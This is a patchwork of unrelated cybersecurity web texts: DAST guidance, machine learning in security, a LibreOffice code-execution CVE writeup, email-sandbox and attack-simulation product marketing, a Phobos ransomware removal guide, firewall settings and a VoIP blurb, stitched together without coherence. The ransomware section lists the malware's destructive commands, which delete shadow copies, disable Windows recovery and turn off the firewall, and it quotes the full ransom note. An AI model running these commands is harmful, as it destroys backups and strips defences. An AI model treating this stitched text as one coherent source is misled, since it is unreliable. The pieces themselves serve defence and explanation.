Unlike SAST, it can detect flaws in authentication and encryption that allow unwanted access. Additionally, DAST can test the IT infrastructure resources, such as networking and data storage, that your web application makes use of. This means that DAST can be used to test not only your application or web services but the complete IT environment they are embedded in.

Implementation of DAST

DAST is not as easy to integrate into your testing pipeline as SAST, because it depends on your application being run. Although DAST can be automated, the manual steps necessary to prepare the process for automation must first be recorded. After integrating a DAST tool into your pipeline, a certain procedure must be followed.

- Ask your users for feedback: As the first step in DAST testing implementation, observing how users interact with your software is invaluable. Don't just keep track of their actions; have them explain them as well. Frequent interactions in an application can cause users to lose track of what they are doing. Users are better able to concentrate on their work as a result, but the fact that they don't have to give much thought to what they're clicking on is no guarantee that it won't cause trouble down the line.
- Automate user interactions: The next step is to script the user's activities using an automation tool. This may be easier to accomplish with command-line and API programs than with graphical-user-interface programs, but it is theoretically possible with any of these.
- Add the test scripts to your CI/CD pipeline: When you've finished automating the most crucial parts of your application's interactions, run these scripts against your application while a DAST tool analyses it. It is possible to begin addressing security flaws after the initial DAST run.
- Add regression tests to the testing suite: As you discover security holes in your app's regular use, you can patch them by including scripts that mimic those real-world scenarios in your test suite. This guarantees that the problems will not arise again.

The Wallarm vulnerability and incident detection module identifies application-specific flaws and actively evaluates threats to isolate high-risk incidents from a sea of non-threatening attacks. The Wallarm NG-WAF module also collects attack data that is then processed by the Wallarm DAST. Wallarm parses malicious requests for their payload, attack type, and application endpoint, and then generates scanner tests based on this information. When an existing application vulnerability was the target of the attack, Wallarm DAST can determine this and create a ticket for fixing the problem.

All existing or future DevOps pipelines should include a security technology that does not impede development speed. The second most popular AST method, after static application security testing (SAST), is dynamic application security testing. Both established and up-and-coming businesses are increasingly integrating DAST into their workflows for creating new software. It's true that Dynamic Application Security Testing is effective at discovering flaws in your application that only manifest at runtime, but this type of testing can never be guaranteed to locate every possible security hole. You should not expect this tool alone to give you comprehensive protection for your application. This is why some companies employ multiple AST tools in their development setting.
Multiple AST (Application Security Testing) tools are better than one when it comes to finding security flaws in software.
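To make the request/response probing described under "How Does DAST Work?" concrete, here is a toy sketch of a reflected-XSS check (my own illustration, not any vendor's scanner; the target URL and parameter name are invented):

```python
# Toy DAST-style probe: inject a marker payload into a query parameter
# and check whether it is reflected unescaped in the response body.
# The target URL and parameter name are invented for illustration.
import requests

TARGET = "http://localhost:8080/search"
PAYLOAD = "<script>alert('dast-probe')</script>"

resp = requests.get(TARGET, params={"q": PAYLOAD}, timeout=10)
if PAYLOAD in resp.text:
    print("Possible reflected XSS: payload echoed without encoding")
else:
    print("Payload not reflected verbatim")
```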
Machine learning is one concept that has, in the recent past, greatly invaded the cybersecurity domain and is changing it for the better. In today's context, it would be impossible to deploy effective cybersecurity technologies without relying on machine learning. Machine learning reduces the amount of time spent on routine tasks and helps organizations use their resources strategically. It makes cybersecurity simpler, less expensive, more proactive, and far more effective.

What is Cybersecurity?

Cybersecurity involves protecting interconnected systems: hardware, software, electronic data, and so on. The main purpose of cybersecurity is to prevent data breaches, identity theft, and cyberattacks, which helps with risk management. If an organization has a strong sense of network security and an effective incident response plan, it will find it easier to prevent and mitigate cyberattacks.

What is Machine Learning?

Machine learning refers to machines being able to learn by themselves without being explicitly programmed. It is an application of AI which enables systems to learn and improve from experience automatically. Machine learning relies on various sets of algorithms, which use training data to enable computers to learn.

Challenges of the Cybersecurity Domain

Though machine learning is helping the field of cybersecurity prosper, it still has the following challenges to overcome.
- Anomaly detection is challenging to define, as it needs a clear definition of what is considered normal activity.
- The methods and tactics of cyberattacks constantly change. Models must therefore quickly adapt to new patterns and behaviors.
- False positives can be costly with respect to data privacy and infrastructure.
- Attackers use machine learning methods to power their own attacks: creating new malware, phishing content, and possible flags; self-protecting infected nodes; and identifying recurring patterns.

Machine Learning Use Cases For Cybersecurity

Some of the ways in which machine learning improves cybersecurity are:

1. Risk Detection

Machine learning is used to analyze, monitor, and respond to cyberattacks and security incidents. It can act as the foundation stone of your cybersecurity framework by assisting in the protection, detection, identification, response, and discovery of cybercrime. SparkCognition, the Austin-based AI company, has partnered with Google Cloud Machine Learning Engine to prevent endpoint attacks and detect security threats early. As stated by Google, the engine can detect zero-day threats with an accuracy of 99.5%.

2. Malware Detection

Malware refers to software designed to damage or infiltrate a computer system. A traditional approach to malware detection focused on identifying features using hashes, file properties, and code fragments. Algorithmic rules are created from these to classify a file as malware or benign. One of the major challenges of malware detection is the continuous evolution of malware files and versions; rule-based approaches cannot adapt to these changes. Machine learning is used to detect ransomware by analyzing files during the pre-execution phase. Another challenge is detecting rare attacks, such as high-profile targeted attacks. Nowadays, deep learning algorithms are also used to detect these types of attacks, and they will continue to become an asset in malware detection in the future.
3. Phishing Detection

Phishing refers to stealing personally identifiable information such as account details, passwords, intellectual property, credit card data, and financial information. Phishing uses social engineering and technology to lure users into sharing sensitive and personal data. The common types of phishing attacks are website cloning, voice and text phishing, and deceptive linking. The three main groups of anti-phishing methods are:
- Preventive (patch and change management, authentication).
- Detective (content filtering, anti-spam, and monitoring).
- Corrective (forensics, site takedown).

4. Spam Detection

Machine learning greatly improves cybersecurity through spam detection. A large portion of spam attempts is blocked from reaching inboxes thanks to robust machine-learning-powered spam filters. Machine learning methods offer more scalability and efficiency than knowledge-based methods. There are different approaches to spam detection: you can classify emails as spam based on a finite set of rules, which is inflexible, unscalable, and costly, or you can use machine learning techniques, as in the toy sketch below.

Machine learning, in short, helps businesses better analyze threats and respond to security incidents and attacks. Using machine learning in cybersecurity is a fast-growing trend, as businesses across several industries worldwide are using it to streamline their business processes. Thanks to machine learning, many companies have shifted from signature-based systems to machine learning systems.
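Here is that toy sketch: a bag-of-words Naive Bayes spam classifier using scikit-learn (my own illustration; the tiny inline dataset is invented and far too small for real use):

```python
# Toy spam classifier: bag-of-words features + Naive Bayes.
# Requires: pip install scikit-learn
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB

emails = [
    "win a free prize now", "cheap meds limited offer",
    "meeting agenda for monday", "quarterly report attached",
]
labels = [1, 1, 0, 0]  # 1 = spam, 0 = ham

# Turn each email into word-count features, then fit the classifier.
vectorizer = CountVectorizer()
features = vectorizer.fit_transform(emails)

model = MultinomialNB()
model.fit(features, labels)

test = vectorizer.transform(["free prize offer"])
print(model.predict(test))  # -> [1], i.e. classified as spam
```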
Intrusion Detection Systems (IDSs) are one of the key components for securing computing infrastructures. Their objective is to protect against attempts to violate defense mechanisms. Indeed, IDSs themselves are part of the computing infrastructure, and thus they may be attacked by the same adversaries they are designed to detect. This is a relevant aspect, especially in safety-critical environments, such as hospitals, aircraft, nuclear power plants, etc. To the best of our knowledge, this […]
doi:10.1016/j.ins.2013.03.022
Recently, a bug found in the popular LibreOffice office suite was disclosed. This vulnerability was cataloged as CVE-2019-9848. The flaw can be used to execute arbitrary code when opening documents pre-prepared by a malicious person, who can then simply distribute them and wait for victims to open these documents.

The vulnerability is caused by the fact that LibreLogo, a component aimed at teaching programming and inserting vector drawings, translates its operations into Python code. By having the ability to execute LibreLogo instructions, an attacker can execute any Python code in the context of the current user session, using the "run" command provided in LibreLogo. From Python, using system(), one can in turn call arbitrary system commands. As described by the person who reported this bug:

Macros shipped with LibreOffice run without prompting the user, even at the highest macro security settings. So if there was a LibreOffice system macro with an error allowing code to run, the user would not even get a warning and the code would run immediately.

About the flaw

LibreLogo is an optional component, but LibreOffice offers macros by default, allowing LibreLogo to be called without requiring confirmation of the operation and without displaying a warning, even when the maximum protection mode for macros is enabled (the "Very high" level). For an attack, such a macro can be attached to an event handler that fires, for example, when the mouse hovers over a specific area or when input focus is activated on the document (the onFocus event). The big problem here is that the code is not properly sanitized in translation, and script code often results in the same code after translation to Python. As a result, when a document prepared by an attacker is opened, hidden execution of Python code can be achieved, invisible to the user. For example, in the demonstrated exploit, opening the document launches the system calculator without any warning.

This is not the first reported bug in which event handlers in the office suite are exploited: months ago another case was announced where, in earlier 6.1.x versions, code injection was shown to be possible on Linux and Windows when a user hovers the mouse over a malicious URL. In that case too, exploiting the vulnerability did not generate any type of warning dialog: as soon as the user hovered the mouse over the malicious URL, the code ran immediately. On the other hand, the use of Python within the suite has also revealed bugs where the suite executes arbitrary code without restrictions or warnings. With this, the LibreOffice developers have a great task in reviewing this part of the suite, since there are several known cases that take advantage of it.

The vulnerability was fixed, without further details being given, in update 6.2.5 of LibreOffice, released on July 1, but it turned out that the problem was not completely resolved (only the LibreLogo call from macros was blocked) and some other vectors for carrying out the attack remained uncorrected. The problem is also not resolved in version 6.1.6, which is recommended for corporate users. Complete elimination of the vulnerability is planned for the release of LibreOffice 6.3, expected next week. Before a full update is released, users are advised to explicitly disable the LibreLogo component, which is available by default in many packages.
The vulnerability was partially fixed in Debian, Fedora, SUSE / openSUSE, and Ubuntu.
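Where LibreLogo ships as a separate package, it can be removed outright until a fully fixed release lands. A minimal sketch; libreoffice-librelogo is the package name on Debian-family systems and is an assumption for other distributions:

sudo apt remove libreoffice-librelogo   # Debian/Ubuntu; verify the package name on your distribution

Macro security settings can also be reviewed under Tools > Options > LibreOffice > Security, although, as noted above, even the "Very high" level did not block this particular vector.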
Email sandboxing improves protection against spear phishing, advanced persistent threats (APTs), and emails that contain attachments with malicious code or malware. You could lose valuable email messages if you set filters to automatically delete suspicious messages, so an email sandbox instead intercepts a suspicious message and stores it in a safe location. The sandbox is inaccessible to users, and the email message cannot affect the business network while it's stored there. The sandboxed location is safe for storing suspicious email messages until an administrator can review them. Any false positive messages can then be sent to their respective recipient inboxes. True positive messages can be further investigated to determine whether the business is the target of an email-based threat.

How Email Sandboxing Works in SpamTitan

If you're looking for an anti-spam solution to protect your business from nuisance messages and potential malware, TitanHQ's SpamTitan has several benefits and advanced technology to fit every industry. Administrators can deploy SpamTitan within minutes and immediately begin protecting their infrastructure and users from unwanted email messages.

How is Malware Delivered via Email?

Malware can be installed in several ways, but email is one of the most common attack vectors. In a phishing attack, an email is sent to an individual with an attachment containing malicious code which, if executed, will result in the installation of malware. The attack could be a one-step process or a more advanced two-stage approach where the attachment contains code to download the final payload. Another strategy embeds links in an email message to direct users to an attacker-controlled website. If the malicious link is clicked, corporate users are directed to a malicious site where they could be tricked into downloading malware or divulging their corporate network credentials. Usually, in a two-stage attack redirecting users to an attacker-controlled site, the website looks similar to a familiar business; for example, it could look like a Google product to trick users into trusting the download. Installation of the executable could create backdoors for additional malware attacks, leave the user's machine open to remote control, run data-eavesdropping software in the background to send data to cyber-criminals, and cause many other compromises that could be devastating to the business.

How Does an Email Sandbox Block Malware?

Email security solutions employ a variety of triggers for detecting threats and blocking them from reaching user inboxes. For instance, it's common for threat intelligence agencies to aggregate the IP addresses of servers known for sending malicious email messages. Email security software keeps an updated record of malicious email server IP addresses and uses the blocklist to automatically sandbox any messages sent from one of these servers. The IP address of a sender's email server is stored in the message headers, so it's part of a message's data. Another strategy is to scan attachments and messages as the recipient's email server receives them. Email security installed on email servers uses antivirus applications to monitor message content and attachments, adding another protection layer for businesses.
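Before moving on to antivirus scanning, here is the blocklist trigger described above as a minimal sketch of checking a message's sending server against an IP blocklist. This is an illustration, not SpamTitan's implementation; the blocklist values and header layout are assumptions:

import re
from email import message_from_string

# Illustrative blocklist of known-bad sending server IPs.
BLOCKLIST = {"203.0.113.7", "198.51.100.23"}

def sending_ip(raw_message: str) -> str | None:
    """Pull the connecting server's IP from the Received headers."""
    msg = message_from_string(raw_message)
    for header in msg.get_all("Received") or []:
        match = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", header)
        if match:
            return match.group(1)
    return None

def should_sandbox(raw_message: str) -> bool:
    """Sandbox the message if it came from a blocklisted server."""
    ip = sending_ip(raw_message)
    return ip is not None and ip in BLOCKLIST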
If antivirus software detects a potential threat in an email message, the message is sent to the email security system's sandbox. In the sandbox, the attachment cannot affect the business environment, and administrators can review the threat to understand the attacker's goal and strategy. Antivirus scans are beneficial if the email content contains a known threat. However, threat authors continually revise their malware programs to bypass antivirus detection. Antivirus software detects threats based on a signature: when an author revises their code, the signature changes and no longer matches the previous code's signature. An antivirus program scanning email attachments helps stop known threats but cannot identify new malware or zero-day threats. Malware authors create variants of their software, and the slight changes bypass signature detection and evade some monitoring systems. Businesses must then defend against dozens of variants that act like previous threats but whose code changes make them undetectable to older, ineffective cybersecurity infrastructure. Advanced technology included in SpamTitan uses more effective strategies for identifying malicious attachments. Artificial intelligence (AI) in SpamTitan identifies zero-day threats and uses various models to detect a threat rather than relying on a database of malware signatures. Blocking of known malicious email servers' IP addresses is also incorporated.

What is Email Sandboxing?

Email sandboxing is a security feature that helps to identify and block these new email-based threats. Exploits not yet seen in the wild are called zero-day (or zero-hour) threats, so named because antivirus vendors have no signatures for them until they are analyzed. With AI-driven email security, zero-day threats are identified using numerous triggers and data contained within messages, including their headers. After email security identifies a threat, it must send messages to a safe location. The sandbox is a segmented storage location that malware cannot reach the internal network from. Malware can be stored without affecting the internal network, and administrators can review it without affecting their devices. Security analysts use these sandboxed executables to research zero-day threats and identify their attack mode. Included with the SpamTitan sandbox is machine learning automation to perform behavioral analysis. The analysis can determine how sandboxed malware behaves, so that the research can be reported to others to help stop critical global downtime from sophisticated ransomware or other malicious activity. All machine learning and analysis are done in the sandbox, so malicious messages do not affect the business environment. Executable files aren't the only content analyzed in a SpamTitan sandbox. Other file types can also contain malicious code, including scripts or Microsoft documents. Microsoft documents allow users to write Visual Basic code in macros, and these macros can connect to the internet and download malware with additional payloads. Microsoft Word and Excel files are commonly used to trick users into opening email attachments and running macros that download ransomware and install the malware on the local user's machine. A sandbox system protects users from these files and their macros, and machine learning scans help security researchers identify the payload and malicious code.
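To see why the signature matching just described is brittle, consider a minimal hash-based detection sketch: flipping a single bit in a sample changes its digest, so the lookup fails even though the behavior is essentially unchanged (the sample bytes here are placeholders):

import hashlib

sample = b"...bytes of a previously analyzed sample..."
known_signatures = {hashlib.sha256(sample).hexdigest()}

variant = bytearray(sample)
variant[0] ^= 0x01  # flip one bit; the 'malware' behaves the same

print(hashlib.sha256(sample).hexdigest() in known_signatures)          # True
print(hashlib.sha256(bytes(variant)).hexdigest() in known_signatures)  # False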
The quarantine section of an email sandbox also avoids data loss after a false positive. False positives are incorrectly flagged messages: a sender might forward a message containing a link to a questionable site, and that site might be legitimate. If the email security system automatically deletes the message, it never reaches the recipient's inbox, and important messages incorrectly flagged and deleted could cause severe communication issues between businesses and customers. Quarantining messages gives security researchers more time to understand an ongoing attack and build tools to stop it. Some sophisticated attacks, including ransomware, use email as their delivery method. In a sandboxed quarantine, researchers can review delivery methods and payloads to gain insight into the malware's goals and potentially identify the author. Sophisticated attacks usually involve multiple cyber-criminals working in groups to target businesses and governments. Using a sandbox protects users from malware while avoiding data deletion in the case of false positives - two of the most important benefits of email security. Email filters like SpamTitan can also stop nuisance messages from taking up expensive storage space on the network. Storage costs money, and spam messages can quickly fill it up. Nuisance messages fill up a sandbox too, but they can then be deleted to restore storage capacity for legitimate messages.

The Benefits of Email Sandboxing

Protecting employees from malicious email messages is just one apparent benefit of email filters, but adding a layer of security to your digital communications has several less apparent benefits. Email filtering software benefits the business but can also help email administrators, security professionals, and other staff members responsible for protecting corporate data and business infrastructure. A few other benefits of an email sandbox include:

- Early detection of advanced attacks, prevention of data breaches, and reduced incident response and investigation costs.
- Reduced threat-hunting effort to find the latest cyber-criminal activity and zero-day malware.
- Prevention of server and endpoint operating systems from being exposed to email-based threats.
- Ease of integration with your operating system environment using cloud implementations.
- Automatic stopping of threats before they execute in the business environment, including advanced persistent threats, targeted phishing attacks, malware evasion strategies, obfuscated executables, malware variants, customized malicious code, and ransomware.
- Continuous protection, using artificial intelligence and machine learning, against evolving advanced persistent threats.
- Cost savings from the removal of spam and other nuisance messages that exhaust storage capacity unnecessarily.
- Cloud-based solutions that make integrating an email sandbox into your email processes easy without extensive changes to infrastructure configurations.
- Defense against threats that could compromise business assets and cause critical data breaches.
- Compliance with the latest regulations, avoiding hefty fines for violations.

Every midsize to enterprise business receives thousands of messages targeting employees. Employees are a company's weakest link, and phishing messages are incredibly effective.
Having a sandbox environment benefits your security strategy two-fold: it protects your users from being a point of weakness in your cyber defenses, and it gives your security staff a way to evaluate an attack so they can prepare and notify users. Not every email filtering solution has a sandbox, but SpamTitan includes one to help security researchers better understand ongoing attacks. The artificial intelligence and machine learning included with the SpamTitan products also speed up identification of attacks, especially if other researchers have yet to see a particular attack strategy or exploit in the wild.

It's important to note that a good security strategy is built in layers, and email filtering solutions are just one layer. A sandbox environment included with an email filtering solution is another layer and an added benefit. Every organization should maintain additional security infrastructure on the network environment, including antivirus and antimalware as a failsafe, monitoring software to detect any suspicious network activity, and intrusion prevention to stop malicious activity on the network automatically. The sandbox environment included with SpamTitan is a complementary feature in email filtering security. Security awareness training should also be included in your strategy: should a malicious email bypass email security and filters, security awareness training should enable employees to detect phishing and social engineering. Having several layers plus security awareness training makes it much more difficult for cyber-criminals to compromise business systems and steal data.

SpamTitan Email Sandboxing

Not all email filtering solutions are built the same, and your choice of email security should fit your business requirements. SpamTitan is more than simple email filtering software: it's an extensive suite of advanced email security features built by TitanHQ engineers for businesses that need better research into, and protection from, zero-day threats. The sandbox also works on current threats, which researchers can review for any variants. With the SpamTitan suite of products, businesses get advanced email security features, including a gateway where administrators can connect existing infrastructure. The gateway is a virtual appliance that connects your current on-premises or cloud email infrastructure to the SpamTitan email filtering software. Included with SpamTitan is an antivirus scanner that analyzes all email attachments as they flow to your employee inboxes and detects malware and malicious macros embedded in documents. The Bitdefender-powered sandbox scans and analyzes incoming email messages, and the integrated artificial intelligence can identify zero-day threats. Since SpamTitan is cloud-based, the sandbox also sits in the cloud, so malicious code or documents never land on your network where they could be accidentally executed. The behavioral analysis helps security researchers or onsite staff determine the exact threat and the potential motivation behind targeted phishing, malware, and social engineering attacks. Sandboxing features let these security researchers and staff safely review threats without harming the business network environment. When SpamTitan detects a threat, it immediately quarantines the email message and its attachments, and quarantined messages are sent to the Bitdefender Global Protective Network cloud threat intelligence services.
Threat intelligence services help businesses identify new threats, and security researchers pool their discoveries so that zero-day threats are detected more quickly and cyber-defenses are built to stop them. Several large security groups and technology companies contribute to threat intelligence, and the collaboration helps smaller businesses with no onsite security staff or researchers. Research collected from threat intelligence contributes to updates across all cybersecurity fields, and SpamTitan incorporates new research intelligence into its updates to stop the latest identified threats. The Bitdefender threat intelligence network consists of more than 650 million endpoints worldwide, so the SpamTitan software leverages the work of numerous researchers around the globe; this is why SpamTitan email sandboxing achieves such high detection rates. Using artificial intelligence and threat research, the SpamTitan system automatically blocks any messages carrying the same threat. Messages with known threats bypass the sandbox environment, and SpamTitan blocks them from reaching the intended recipient's inbox. When a malicious email is detected, it is quarantined and the threat information is sent to the Bitdefender Global Protective Network cloud threat intelligence service, so all other endpoints connected to the network are protected. If the file or link is encountered again, it does not need to pass through the email sandboxing feature: the message is blocked automatically.

Try SpamTitan Email Security with Sandboxing Free of Charge

You need an email security solution with email sandboxing to improve email security. To learn how easy SpamTitan is to set up and use to better protect your email environment, we invite you to try the solution for 30 days on a no-obligation, 100% free trial.

How Email Sandboxing Works in SpamTitan

Using a more aggressive pre-filter than the regular AV engine, Bitdefender Antivirus determines whether an email attachment should be sent to the sandbox. If the engine recommends an attachment be sent to the sandbox, the following occurs: if the email would not otherwise have been blocked by any other means, SpamTitan uploads the attachment to the sandbox, where it is assigned a job identifier. SpamTitan queries the sandbox every fifteen seconds (for up to twenty minutes) to see if the job is complete. During this period, the message delivery status in History is 'Sent to Sandbox.' If no result is returned after twenty minutes, the file is marked as clean and the email is passed. If the sandbox reports that the attachment contains malware, the email is blocked as a virus with the virus name ATP.Sandbox, and the message is listed under Viruses in the relevant Quarantine report. You can view emails that have been sandboxed by filtering them in History: go to Reporting > History > Mail Filters and check 'Sandboxed.' If a message blocked as spam is released and was originally marked as 'Sent to Sandbox,' SpamTitan re-scans the message against the Bitdefender Antivirus engine upon release, which may result in the message being blocked or sent to the sandbox again.

What is the email sandboxing process?

When an email arrives at an organization's email server, it is first scanned by an email filter for known malicious content.
If the email filter finds no malicious content, the email is then sent to a sandbox for further analysis. The sandbox analyzes the email for malicious content using file scanning, behavioral analysis, and machine learning techniques. If a threat is found, the email is quarantined and system administrators are notified by email.

What are the benefits of email sandboxing?

The benefits of email sandboxing include protection from malicious content, improved email filtering accuracy, fewer false positives, and a reduced risk of data breaches. It is also worth noting that SpamTitan supports "time-of-click" analysis, so that if a link in an email passes the sandboxing tests but is later weaponized, the SpamTitan web filter will prevent the user from accessing the malicious website.

What are the best practices for effective email sandboxing?

The best practices for effective email sandboxing include:

- Deploying an email filter supplied by a reputable provider.
- Configuring the sandboxing capability to meet the specific needs of the organization.
- Monitoring the capability's output for false negatives and false positives.
- Educating the workforce to report email-borne threats that evade detection by the sandboxing capability.

Are there any disadvantages of email sandboxing?

There are disadvantages of email sandboxing - the primary one being that the delivery of legitimate emails can be delayed by the inspection process. While this can be overcome by allowlisting emails from trusted sources (so they bypass the inspection process), that solution does not scale well because trusted sources' email accounts can be compromised. Another disadvantage is that email sandboxing can provide a false sense of security: if users believe every email goes through the sandbox process, they may become less diligent about how they interact with emails. SpamTitan acknowledges this risk and includes "time-of-click" URL analysis among its robust security features.

How does sandboxing improve an organization's email security strategy?

Sandboxing improves an organization's email security strategy by providing an additional defense against previously unknown and emerging threats that may evade traditional security measures. Email sandboxing reduces the risk of successful attacks by isolating potentially malicious content, and, by investigating the content of the email, organizations gain valuable insights into the behavior and characteristics of the malicious content - aiding threat intelligence and future prevention efforts.
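The fifteen-second polling cycle described in the SpamTitan section above maps onto a simple loop. A minimal sketch; the query_sandbox helper and its return values are hypothetical stand-ins for the real service calls:

import time

POLL_INTERVAL = 15       # seconds, per the behavior described above
POLL_TIMEOUT = 20 * 60   # give up after twenty minutes

def query_sandbox(job_id: str) -> str | None:
    """Hypothetical helper: returns 'clean', 'malware', or None while pending."""
    raise NotImplementedError

def await_verdict(job_id: str) -> str:
    deadline = time.monotonic() + POLL_TIMEOUT
    while time.monotonic() < deadline:
        verdict = query_sandbox(job_id)
        if verdict is not None:
            return verdict         # 'malware' -> block as ATP.Sandbox
        time.sleep(POLL_INTERVAL)  # History shows 'Sent to Sandbox' meanwhile
    return "clean"                 # no result after the timeout: pass the mail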
Penetration tests offer a snapshot of an organization's defenses at a specific point in time; XM Cyber tests continuously to keep you up to date as problems arise. Cybersecurity experts know the value of penetration testing, and many compliance rules require these tests on a regular basis. The goal is to act like a hacker and run simulated cyberattacks to find weaknesses in current IT systems and network security. XM Cyber improves upon existing pen test techniques by automating the process, continually and safely simulating a realistic, full attack cycle against an entire enterprise network infrastructure. While typical pen test activities identify whether an attacker can get into a network, XM Cyber expands on this concept to answer the question: does my security work? The benefits of automated attack simulation over typical manual pen testing are easily identified - manual effort is decreased, the process can run continuously instead of once or twice a year, and the tools used are updated constantly. If the security posture of an organization changes, XM Cyber will identify the new gaps and report them. In addition, XM Cyber provides a prioritized response plan that focuses scarce security and IT resources on solving the most critical issues. Automate tedious, manual pen tests to maximize your scarce IT security resources. Rely on XM Cyber Labs and the MITRE ATT&CK framework to update attack scenarios regularly. The goal is to prevent future attacks, not just identify problems. Use our actionable remediation reports to prioritize security and IT projects to protect what's most important. See every step with a detailed, visual map of your entire network. Drill down to the devices and successful hacker steps that might reach your critical assets.

Safe in Production

XM Cyber uses patented simulation techniques that do not require real exploits to be unleashed on your network. Run continuously to identify every attack vector available to an attacker to compromise your most critical assets.
What is .eldaolsa file infection? Also referred to as PHOBOS ransomware, it modifies your documents by encrypting them and demands a ransom to be paid, allegedly to restore access to them. The id[XXXXXXXX-XXXX].[icq_konskapisa].eldaolsa pattern indicates icq_konskapisa as a channel for contacting the ransomware authors. The PHOBOS ransomware is active again through its new cryptovirus bearing the name .eldaolsa. This particular virus family modifies all popular file types by adding the .eldaolsa extension, thus making the data absolutely unavailable: the victims simply cannot open their important documents anymore. The ransomware also assigns its unique identification key, just like all previous representatives of the virus family. As soon as a file is encrypted by the ransomware, it obtains a special new extension, which becomes the secondary one. The file virus also generates a ransom note providing the users with instructions, allegedly to restore the data.

Eldaolsa Threat Summary

| Name | .id[XXXXXXXX-XXXX].eldaolsa file virus |
| Extension | [icq_konskapisa].eldaolsa |
| Detection | Razy.750692, Trojan:Win32/Glupteba.KMG!MTB, Trojan:Win32/Wacatac.DE!ml |
| Short Description | The ransomware encrypts the documents on the attacked device and asks the victim to pay a ransom, supposedly to recover them. |
| Symptoms | The file virus encrypts the data by adding the .eldaolsa extension, also generating a one-of-a-kind identifier. Note that the [icq_konskapisa].eldaolsa extension becomes the secondary one. |
| Distribution Method | Spam, email attachments, compromised legitimate downloads, attacks exploiting weak or stolen RDP credentials1. |
| Fix Tool | See If Your System Has Been Affected by .eldaolsa file virus |

Eldaolsa deletes shadow copies of files, disables the Windows recovery and repair functions at the boot stage, disables the firewall with commands, and launches the mshta.exe application to display the ransomware demands:

- vssadmin.exe: vssadmin delete shadows /all /quiet (deletes volume shadow copies)
- WMIC.exe: wmic shadowcopy delete (removes shadow copies via WMI)
- bcdedit.exe: bcdedit /set {default} recoveryenabled no (disables Windows recovery)
- bcdedit.exe: bcdedit /set {default} bootstatuspolicy ignoreallfailures (suppresses boot-failure recovery)
- netsh.exe: netsh advfirewall set currentprofile state off (disables the firewall, modern syntax)
- netsh.exe: netsh firewall set opmode mode=disable (disables the firewall, legacy syntax)

.eldaolsa File Virus - Phobos Ransomware: What Is It and How Did I Get It?

The .eldaolsa ransomware is most commonly spread by means of a payload dropper, which runs the malicious script that eventually installs the file virus. The threat circulates actively on the web, judging by the facts about the ransomware recorded in the VirusTotal database. The .eldaolsa ransomware may also promote its payload files through popular social networks and via file-sharing platforms. Alternatively, some free applications hosted on many popular resources may be disguised as helpful tools, whereas they instead may lead to the malicious scripts that inject the ransomware. Your personal caution to prevent the .eldaolsa virus attack matters a lot!

.eldaolsa ransomware is an infection that encrypts your data and presents a frustrating ransom notice. Below is a quotation of the message shown in the screenshot:

All your files have been encrypted! All your files have been encrypted due to a security problem with your PC.
If you want to restore them, write us to the e-mail icq_konskapisa Write this ID in the title of your message ********-**** If there is no response from our mail, you can install the Jabber client and write to us in support of You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the tool that will decrypt all your files. Free decryption as guarantee Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 4Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) How to obtain Bitcoins The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ Jabber client installation instructions: Download the jabber (Pidgin) client from https://pidgin.im/download/windows/ After installation, the Pidgin client will prompt you to create a new account. Click "Add" In the "Protocol" field, select XMPP In "Username" - come up with any name In the field "domain" - enter any jabber-server, there are a lot of them, for example - exploit.im Create a password At the bottom, put a tick "Create account" Click add If you selected "domain" - exploit.im, then a new window should appear in which you will need to re-enter your data: User password You will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) If you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install Attention! Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Remove [icq_konskapisa].eldaolsa File Virus (Phobos)

Why I would recommend GridinSoft2: it is an excellent way to deal with recognizing and removing threats. This program will scan your PC, find and neutralize all suspicious processes3.

Download GridinSoft Anti-Malware. You can download GridinSoft Anti-Malware by clicking the button below:

Run the setup file. When the setup file has finished downloading, double-click on the setup-antimalware-fix.exe file to install GridinSoft Anti-Malware on your system. A User Account Control prompt will ask you to allow GridinSoft Anti-Malware to make changes to your device; click "Yes" to continue with the installation.

Press the "Install" button. Once installed, Anti-Malware will run automatically.

Wait for the Anti-Malware scan to complete. GridinSoft Anti-Malware will automatically start scanning your computer for Eldaolsa infections and other malicious programs. This process can take 20-30 minutes, so I suggest you periodically check on the status of the scan process.

Click on "Clean Now". When the scan has finished, you will see the list of infections that GridinSoft Anti-Malware has detected. To remove them, click on the "Clean Now" button in the right corner.

How to decrypt .eldaolsa files?
You can download and use the decrypter that Kaspersky released if you were hit by the .[icq_konskapisa].eldaolsa extension.

What's next? If the guide doesn't help you to remove the Eldaolsa infection, please download the GridinSoft Anti-Malware that I recommended. Also, you can always ask me in the comments for help. Good luck!

- How To Change Remote Desktop (RDP) Port: https://howtofix.guide/change-remote-desktop-port-on-windows-10/
- GridinSoft Anti-Malware Review from the HowToFix site: https://howtofix.guide/gridinsoft-anti-malware/
- More information about GridinSoft products: https://gridinsoft.com/products/
To add a local user to the database, configure the settings described in the following table.

Local User Settings

Name - Enter a name to identify the user (up to 31 characters). The name is case-sensitive and must be unique. Use only letters, numbers, spaces, hyphens, and underscores.

Location - Select the scope in which the user account is available. In the context of a firewall that has more than one virtual system (vsys), select a vsys or select Shared (all virtual systems). In any other context, you can't select the Location; its value is predefined as Shared (for a firewall) or as Panorama. After you save the user account, you can't change its Location.

Password / Confirm Password - Use these fields to specify the authentication password: enter and confirm a password for the user.

Password Hash - Enter a hashed password string. This can be useful if, for example, you want to reuse the credentials for an existing Unix account but don't know the plaintext password, only the hashed password. The firewall accepts any string of up to 63 characters regardless of the algorithm used to generate the hash value. The operational CLI command request password-hash password <password> uses the MD5 algorithm when the firewall is in normal mode and the SHA256 algorithm when the firewall is in CC/FIPS mode.
An instructional video showing how to set up the Grandstream HT286 adapter for calling over the internet with ordinary telephones. Grandstream HT286 Reboot. Grandstream HT286 Firmware Upgrade Problem.

VoIP System for Enterprise Network
